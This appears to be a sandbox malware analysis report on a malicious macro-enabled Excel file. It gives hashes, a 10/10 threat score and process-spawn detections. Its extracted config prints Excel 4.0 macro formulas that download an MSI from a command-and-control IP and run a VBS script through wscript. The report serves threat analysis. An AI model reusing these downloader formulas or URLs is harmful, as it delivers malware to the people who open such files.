General
-
Target
23b60bc9f3011bbce0be570e648c6947
-
Size
6KB
-
Sample
231221-3b9ezscca5
-
MD5
23b60bc9f3011bbce0be570e648c6947
-
SHA1
4ca22d40c35557d945f9b76c998b63e451bcf3a4
-
SHA256
b298bb3c10ec85aa080cc23184c1fc736d61179c6a4f614cc5a6b1a6b3647685
-
SHA512
cebfc71e0558448e55d4daeff9e25af4d8c1fac915d3a73825f411430e73280b6ca41d6a1cb544a504596724d7f0e9ea8d5799965e486e12af63f5a180c9bdd9
-
SSDEEP
192:NDSluSXbrA2OmmfR68UhHFBFYukb98yDb+m:NmuoM2ww1FYdb98yDl
Static task
static1
Behavioral task
behavioral1
Sample
23b60bc9f3011bbce0be570e648c6947.xlsm
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
23b60bc9f3011bbce0be570e648c6947.xlsm
Resource
win10v2004-20231215-en
Malware Config
Extracted
http://46.17.98.187/index.php
http://google.com/index.php
-
formulas
=CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://46.17.98.187/index.php","C:\~\pes.msi",0,0) =CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://google.com/index.php","C:\~\pes.msi",0,0) =EXEC("wscript C:\zer\spp.vbs") =HALT()
Extracted
http://46.17.98.187/index.php
http://google.com/index.php
Extracted
http://46.17.98.187/index.php
Targets
-
-
Target
23b60bc9f3011bbce0be570e648c6947
-
Size
6KB
-
MD5
23b60bc9f3011bbce0be570e648c6947
-
SHA1
4ca22d40c35557d945f9b76c998b63e451bcf3a4
-
SHA256
b298bb3c10ec85aa080cc23184c1fc736d61179c6a4f614cc5a6b1a6b3647685
-
SHA512
cebfc71e0558448e55d4daeff9e25af4d8c1fac915d3a73825f411430e73280b6ca41d6a1cb544a504596724d7f0e9ea8d5799965e486e12af63f5a180c9bdd9
-
SSDEEP
192:NDSluSXbrA2OmmfR68UhHFBFYukb98yDb+m:NmuoM2ww1FYdb98yDl
Score10/10-
Process spawned unexpected child process
This typically indicates the parent process was compromised via an exploit or macro.
-
Process spawned suspicious child process
This child process is typically not spawned unless (for example) the parent process crashes. This typically indicates the parent process was unsuccessfully compromised.
-